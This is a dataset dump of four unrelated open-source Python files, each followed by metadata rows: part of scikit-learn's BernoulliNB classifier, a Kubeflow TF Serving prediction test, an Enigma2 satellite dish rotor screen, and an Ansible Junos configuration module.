"""Calculate the posterior log probability of the samples X"""
X = atleast2d_or_csr(X)
return (safe_sparse_dot(X, self.feature_log_prob_.T)
+ self.class_log_prior_)
class BernoulliNB(BaseDiscreteNB):
"""Naive Bayes classifier for multivariate Bernoulli models.
Like MultinomialNB, this classifier is suitable for discrete data. The
difference is that while MultinomialNB works with occurrence counts,
BernoulliNB is designed for binary/boolean features.
Parameters
----------
alpha : float, optional (default=1.0)
Additive (Laplace/Lidstone) smoothing parameter
(0 for no smoothing).
binarize : float or None, optional
Threshold for binarizing (mapping to booleans) of sample features.
If None, input is presumed to already consist of binary vectors.
fit_prior : boolean
Whether to learn class prior probabilities or not.
If false, a uniform prior will be used.
class_prior : array-like, size=[n_classes,]
Prior probabilities of the classes. If specified the priors are not
adjusted according to the data.
Attributes
----------
`class_log_prior_` : array, shape = [n_classes]
Log probability of each class (smoothed).
`feature_log_prob_` : array, shape = [n_classes, n_features]
Empirical log probability of features given a class, P(x_i|y).
`class_count_` : array, shape = [n_classes]
Number of samples encountered for each class during fitting. This
value is weighted by the sample weight when provided.
`feature_count_` : array, shape = [n_classes, n_features]
Number of samples encountered for each (class, feature)
during fitting. This value is weighted by the sample weight when
provided.
Examples
--------
>>> import numpy as np
>>> X = np.random.randint(2, size=(6, 100))
>>> Y = np.array([1, 2, 3, 4, 4, 5])
>>> from sklearn.naive_bayes import BernoulliNB
>>> clf = BernoulliNB()
>>> clf.fit(X, Y)
BernoulliNB(alpha=1.0, binarize=0.0, class_prior=None, fit_prior=True)
>>> print(clf.predict(X[2]))
[3]
References
----------
C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
Information Retrieval. Cambridge University Press, pp. 234-265.
http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
A. McCallum and K. Nigam (1998). A comparison of event models for naive
Bayes text classification. Proc. AAAI/ICML-98 Workshop on Learning for
Text Categorization, pp. 41-48.
V. Metsis, I. Androutsopoulos and G. Paliouras (2006). Spam filtering with
naive Bayes -- Which naive Bayes? 3rd Conf. on Email and Anti-Spam (CEAS).
"""
def __init__(self, alpha=1.0, binarize=.0, fit_prior=True,
class_prior=None):
self.alpha = alpha
self.binarize = binarize
self.fit_prior = fit_prior
self.class_prior = class_prior
def _count(self, X, Y):
"""Count and smooth feature occurrences."""
if self.binarize is not None:
X = binarize(X, threshold=self.binarize)
self.feature_count_ += safe_sparse_dot(Y.T, X)
self.class_count_ += Y.sum(axis=0)
def _update_feature_log_prob(self):
"""Apply smoothing to raw counts and recompute log probabilities"""
n_classes = len(self.classes_)
smoothed_fc = self.feature_count_ + self.alpha
smoothed_cc = self.class_count_ + self.alpha * n_classes
self.feature_log_prob_ = (np.log(smoothed_fc)
- np.log(smoothed_cc.reshape(-1, 1)))
def _joint_log_likelihood(self, X):
"""Calculate the posterior log probability of the samples X"""
X = atleast2d_or_csr(X)
if self.binarize is not None:
X = binarize(X, threshold=self.binarize)
n_classes, n_features = self.feature_log_prob_.shape
n_samples, n_features_X = X.shape
if n_features_X != n_features:
raise ValueError("Expected input with %d features, got %d instead"
% (n_features, n_features_X))
neg_prob = np.log(1 - np.exp(self.feature_log_prob_))
# Compute neg_prob · (1 - X).T as ∑neg_prob - X · neg_prob
jll = safe_sparse_dot(X, (self.feature_log_prob_ - neg_prob).T)
jll += self.class_log_prior_ + neg_prob.sum(axis=1)
return jll
| bsd-3-clause | 618,567,034,910,407,600 | 34.485965 | 79 | 0.599743 | false |
kubeflow/kubeflow | testing/test_tf_serving.py | 1 | 4781 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 The Kubeflow Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import json
import logging
import numbers
import os
import time
from six.moves import xrange
from grpc.beta import implementations
from kubernetes import client as k8s_client
import requests
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
from kubeflow.testing import test_util
from kubeflow.testing import util
def almost_equal(a, b, tol=0.001):
"""
Compares two json objects (assuming same structure) with tolerance on numbers
"""
if isinstance(a, dict):
for key in a.keys():
if not almost_equal(a[key], b[key]):
return False
return True
elif isinstance(a, list):
for i in xrange(len(a)):
if not almost_equal(a[i], b[i]):
return False
return True
elif isinstance(a, numbers.Number):
return abs(a - b) < tol
else:
return a == b
def main():
parser = argparse.ArgumentParser('Label an image using Inception')
parser.add_argument(
'-p',
'--port',
type=int,
default=9000,
help='Port at which Inception model is being served')
parser.add_argument(
"--namespace", required=True, type=str, help=("The namespace to use."))
parser.add_argument(
"--service_name",
required=True,
type=str,
help=("The TF serving service to use."))
parser.add_argument(
"--artifacts_dir",
default="",
type=str,
help="Directory to use for artifacts that should be preserved after "
"the test runs. Defaults to test_dir if not set.")
parser.add_argument(
"--input_path", required=True, type=str, help=("The input file to use."))
parser.add_argument("--result_path", type=str, help=("The expected result."))
parser.add_argument(
"--workflow_name",
default="tfserving",
type=str,
help="The name of the workflow.")
args = parser.parse_args()
t = test_util.TestCase()
t.class_name = "Kubeflow"
t.name = args.workflow_name + "-" + args.service_name
start = time.time()
util.load_kube_config(persist_config=False)
api_client = k8s_client.ApiClient()
core_api = k8s_client.CoreV1Api(api_client)
try:
with open(args.input_path) as f:
instances = json.loads(f.read())
service = core_api.read_namespaced_service(args.service_name,
args.namespace)
service_ip = service.spec.cluster_ip
model_urls = [
"http://" + service_ip +
":8500/v1/models/mnist:predict", # tf serving's http server
]
for model_url in model_urls:
logging.info("Try predicting with endpoint {}".format(model_url))
num_try = 1
result = None
while True:
try:
result = requests.post(model_url, json=instances)
assert (result.status_code == 200)
except Exception as e:
num_try += 1
if num_try > 10:
raise
logging.info('prediction failed: {}. Retrying...'.format(e))
time.sleep(5)
else:
break
logging.info('Got result: {}'.format(result.text))
if args.result_path:
with open(args.result_path) as f:
expected_result = json.loads(f.read())
logging.info('Expected result: {}'.format(expected_result))
assert (almost_equal(expected_result, json.loads(result.text)))
except Exception as e:
t.failure = "Test failed; " + e.message
raise
finally:
t.time = time.time() - start
junit_path = os.path.join(
args.artifacts_dir,
"junit_kubeflow-tf-serving-image-{}.xml".format(args.service_name))
logging.info("Writing test results to %s", junit_path)
test_util.create_junit_xml_file([t], junit_path)
# Pause to collect Stackdriver logs.
time.sleep(60)
if __name__ == '__main__':
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
main()
| apache-2.0 | 1,005,149,825,542,019,700 | 29.647436 | 79 | 0.642753 | false |
vit2/vit-e2 | lib/python/Screens/Dish.py | 7 | 8474 | # -*- coding: utf-8 -*-
from Screen import Screen
from Components.BlinkingPixmap import BlinkingPixmapConditional
from Components.Pixmap import Pixmap
from Components.config import config, ConfigInteger
from Components.Sources.Boolean import Boolean
from Components.Label import Label
from Components.ProgressBar import ProgressBar
from Components.ServiceEventTracker import ServiceEventTracker
from enigma import eDVBSatelliteEquipmentControl, eTimer, iPlayableService
from enigma import eServiceCenter, iServiceInformation
from ServiceReference import ServiceReference
INVALID_POSITION = 9999
config.misc.lastrotorposition = ConfigInteger(INVALID_POSITION)
class Dish(Screen):
STATE_HIDDEN = 0
STATE_SHOWN = 1
skin = """
<screen name="Dish" flags="wfNoBorder" position="86,100" size="130,220" title="Dish" zPosition="1" backgroundColor="#11396D" >
<widget name="Dishpixmap" position="0,0" size="130,160" zPosition="-1" pixmap="skin_default/icons/dish.png" transparent="1" alphatest="on" />
<widget name="turnTime" position="5,0" size="120,20" zPosition="1" font="Regular;20" halign="right" shadowColor="black" shadowOffset="-2,-2" transparent="1" />
<widget name="From" position="5,162" size="50,17" zPosition="1" font="Regular;17" halign="left" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget name="posFrom" position="57,160" size="70,20" zPosition="1" font="Regular;20" halign="left" shadowColor="black" shadowOffset="-2,-2" transparent="1" />
<widget name="Goto" position="5,182" size="50,17" zPosition="1" font="Regular;17" halign="left" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget name="posGoto" position="57,180" size="70,20" zPosition="1" font="Regular;20" halign="left" shadowColor="black" shadowOffset="-2,-2" transparent="1" />
<widget name="tunerName" position="5,144" size="90,16" zPosition="2" font="Regular;14" halign="left" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget name="turnSpeed" position="75,95" size="50,16" zPosition="2" font="Regular;14" halign="right" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget source="session.FrontendStatus" render="Progress" position="5,205" size="120,10" pixmap="skin_default/bar_snr.png" zPosition="2" borderWidth="2" borderColor="#cccccc">
<convert type="FrontendInfo">SNR</convert>
</widget>
</screen>"""
def __init__(self, session):
self.skin = Dish.skin
Screen.__init__(self, session)
self["Dishpixmap"] = Pixmap()
self["turnTime"] = Label("")
self["posFrom"] = Label("")
self["posGoto"] = Label("")
self["From"] = Label(_("From :"))
self["Goto"] = Label(_("Goto :"))
self["tunerName"] = Label("")
self["turnSpeed"] = Label("")
self.rotorTimer = eTimer()
self.rotorTimer.callback.append(self.updateRotorMovingState)
self.turnTimer = eTimer()
self.turnTimer.callback.append(self.turnTimerLoop)
self.timeoutTimer = eTimer()
self.timeoutTimer.callback.append(self.testIsTuned)
config.usage.showdish.addNotifier(self.configChanged)
self.configChanged(config.usage.showdish)
self.rotor_pos = self.cur_orbpos = config.misc.lastrotorposition.value
self.turn_time = self.total_time = self.pmt_timeout = self.close_timeout = None
self.cur_polar = 0
self.__state = self.STATE_HIDDEN
self.onShow.append(self.__onShow)
self.onHide.append(self.__onHide)
self.__event_tracker = ServiceEventTracker(screen=self,
eventmap= {
iPlayableService.evStart: self.__serviceStarted,
iPlayableService.evTunedIn: self.__serviceTunedIn,
})
def updateRotorMovingState(self):
moving = eDVBSatelliteEquipmentControl.getInstance().isRotorMoving()
if moving:
if self.cur_orbpos != INVALID_POSITION and self.cur_orbpos != config.misc.lastrotorposition.value:
config.misc.lastrotorposition.value = self.cur_orbpos
config.misc.lastrotorposition.save()
if self.__state == self.STATE_HIDDEN:
self.show()
def turnTimerLoop(self):
if self.total_time:
self.turn_time -= 1
self["turnTime"].setText(self.FormatTurnTime(self.turn_time))
self.close_timeout -=1
if self.close_timeout < 0:
print "[Dish] timeout!"
self.__toHide()
def __onShow(self):
self.__state = self.STATE_SHOWN
prev_rotor_pos = self.rotor_pos
self.rotor_pos = self.cur_orbpos
self.total_time = self.getTurnTime(prev_rotor_pos, self.rotor_pos, self.cur_polar)
self.turn_time = self.total_time
self.close_timeout = round(self.total_time * 1.25) # aded 25%
self["posFrom"].setText(self.OrbToStr(prev_rotor_pos))
self["posGoto"].setText(self.OrbToStr(self.rotor_pos))
self["tunerName"].setText(self.getTunerName())
if self.total_time == 0:
self["turnTime"].setText("")
self["turnSpeed"].setText("")
else:
self["turnTime"].setText(self.FormatTurnTime(self.turn_time))
self["turnSpeed"].setText(str(self.getTurningSpeed(self.cur_polar)) + chr(176) + _("/s"))
self.turnTimer.start(1000, False)
def __onHide(self):
self.__state = self.STATE_HIDDEN
self.turnTimer.stop()
def __serviceStarted(self):
if self.__state == self.STATE_SHOWN:
self.hide()
if not self.showdish:
return
service = self.session.nav.getCurrentService()
info = service and service.info()
data = info and info.getInfoObject(iServiceInformation.sTransponderData)
if not data or data == -1:
return
tuner_type = data.get("tuner_type")
if tuner_type and "DVB-S" in tuner_type:
self.cur_orbpos = data.get("orbital_position", INVALID_POSITION)
self.cur_polar = data.get("polarization", 0)
self.rotorTimer.start(500, False)
def __toHide(self):
self.rotorTimer.stop()
self.timeoutTimer.stop()
if self.__state == self.STATE_SHOWN:
self.hide()
def __serviceTunedIn(self):
self.pmt_timeout = self.close_timeout
self.timeoutTimer.start(500, False)
def testIsTuned(self):
if self.pmt_timeout >= 0:
service = self.session.nav.getCurrentService()
info = service and service.info()
pmt = info and info.getInfo(iServiceInformation.sPMTPID)
if pmt >= 0:
print "[Dish] tuned, closing..."
self.__toHide()
else:
self.pmt_timeout -= 0.5
else:
self.__toHide()
print "[Dish] tuning failed"
def dishState(self):
return self.__state
def configChanged(self, configElement):
self.showdish = configElement.value
def getTurnTime(self, start, end, pol=0):
mrt = abs(start - end) if start and end else 0
if mrt > 0:
if (mrt > 1800):
mrt = 3600 - mrt
if (mrt % 10):
mrt += 10
mrt = round((mrt * 1000 / self.getTurningSpeed(pol) ) / 10000) + 3
return mrt
def getTurningSpeed(self, pol=0):
tuner = self.getCurrentTuner()
if tuner is not None:
from Components.NimManager import nimmanager
nimConfig = nimmanager.getNimConfig(tuner)
if nimConfig.configMode.value == "simple":
if nimConfig.diseqcMode.value == "positioner":
nim = config.Nims[tuner]
if pol in (1, 3): # vertical
return nim.turningspeedV.float
return nim.turningspeedH.float
elif nimConfig.configMode.value == "advanced":
if self.cur_orbpos != INVALID_POSITION:
satlist = nimConfig.advanced.sat.keys()
if self.cur_orbpos in satlist:
currSat = nimConfig.advanced.sat[self.cur_orbpos]
lnbnum = int(currSat.lnb.value)
currLnb = lnbnum and nimConfig.advanced.lnb[lnbnum]
diseqcmode = currLnb and currLnb.diseqcMode.value or ""
if diseqcmode == "1_2":
if pol in (1, 3): # vertical
return currLnb.turningspeedV.float
return currLnb.turningspeedH.float
if pol in (1, 3):
return 1.0
return 1.5
def getCurrentTuner(self):
service = self.session.nav.getCurrentService()
feinfo = service and service.frontendInfo()
tuner = feinfo and feinfo.getFrontendData()
if tuner is not None:
return tuner.get("tuner_number")
return None
def getTunerName(self):
nr = self.getCurrentTuner()
if nr is not None:
from Components.NimManager import nimmanager
nims = nimmanager.nimList()
if nr < 4:
return "".join(nims[nr].split(':')[:1])
return " ".join((_("Tuner"),str(nr)))
return ""
def OrbToStr(self, orbpos):
if orbpos == INVALID_POSITION:
return "N/A"
if orbpos > 1800:
orbpos = 3600 - orbpos
return "%d.%d°W" % (orbpos/10, orbpos%10)
return "%d.%d°E" % (orbpos/10, orbpos%10)
def FormatTurnTime(self, time):
t = abs(time)
return "%s%02d:%02d" % (time < 0 and "- " or "", t/60%60, t%60)
| gpl-2.0 | -1,301,455,545,273,344,800 | 36.157895 | 178 | 0.694995 | false |
Jorge-Rodriguez/ansible-modules-core | network/junos/junos_template.py | 14 | 5097 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: junos_template
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Manage configuration on remote devices running Junos
description:
- The M(junos_template) module will load a candidate configuration
from a template file onto a remote device running Junos. The
module will return the differences in configuration if the diff
option is specified on the Ansible command line
extends_documentation_fragment: junos
options:
src:
description:
- The path to the config source. The source can be either a
file with config or a template that will be merged during
runtime. By default the task will search for the source
file in role or playbook root folder in templates directory.
required: true
default: null
backup:
description:
- When this argument is configured true, the module will backup
the configuration from the node prior to making any changes.
The backup file will be written to backup_{{ hostname }} in
the root of the playbook directory.
required: false
default: false
choices: ["true", "false"]
confirm:
description:
- The C(confirm) argument will configure a time out value for
the commit to be confirmed before it is automatically
rolled back. If the C(confirm) argument is set to False, this
argument is silently ignored. If the value for this argument
is set to 0, the commit is confirmed immediately.
required: false
default: 0
comment:
description:
- The C(comment) argument specifies a text string to be used
when committing the configuration. If the C(confirm) argument
is set to False, this argument is silently ignored.
required: false
default: configured by junos_template
action:
description:
- The C(action) argument specifies how the module will apply changes.
required: false
default: merge
choices: ['merge', 'overwrite', 'replace']
version_added: "2.2"
config_format:
description:
- The C(format) argument specifies the format of the configuration
template specified in C(src). If the format argument is not
specified, the module will attempt to infer the configuration
format based of file extension. Files that end in I(xml) will set
the format to xml. Files that end in I(set) will set the format
to set and all other files will default the format to text.
required: false
default: null
choices: ['text', 'xml', 'set']
requirements:
- junos-eznc
notes:
- This module requires the netconf system service be enabled on
the remote device being managed
"""
EXAMPLES = """
- junos_template:
src: config.j2
comment: update system config
- name: replace config hierarchy
src: config.j2
action: replace
- name: overwrite the config
src: config.j2
action: overwrite
"""
DEFAULT_COMMENT = 'configured by junos_template'
def main():
argument_spec = dict(
src=dict(required=True, type='path'),
confirm=dict(default=0, type='int'),
comment=dict(default=DEFAULT_COMMENT),
action=dict(default='merge', choices=['merge', 'overwrite', 'replace']),
config_format=dict(choices=['text', 'set', 'xml']),
backup=dict(default=False, type='bool'),
transport=dict(default='netconf', choices=['netconf'])
)
module = get_module(argument_spec=argument_spec,
supports_check_mode=True)
comment = module.params['comment']
confirm = module.params['confirm']
commit = not module.check_mode
action = module.params['action']
src = module.params['src']
fmt = module.params['config_format']
if action == 'overwrite' and fmt == 'set':
module.fail_json(msg="overwrite cannot be used when format is "
"set per junos documentation")
results = dict(changed=False)
results['_backup'] = str(module.get_config()).strip()
diff = module.load_config(src, action=action, comment=comment,
format=fmt, commit=commit, confirm=confirm)
if diff:
results['changed'] = True
results['diff'] = dict(prepared=diff)
module.exit_json(**results)
from ansible.module_utils.basic import *
from ansible.module_utils.junos import *
if __name__ == '__main__':
main()
| gpl-3.0 | -6,058,528,165,231,092,000 | 32.754967 | 80 | 0.683147 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.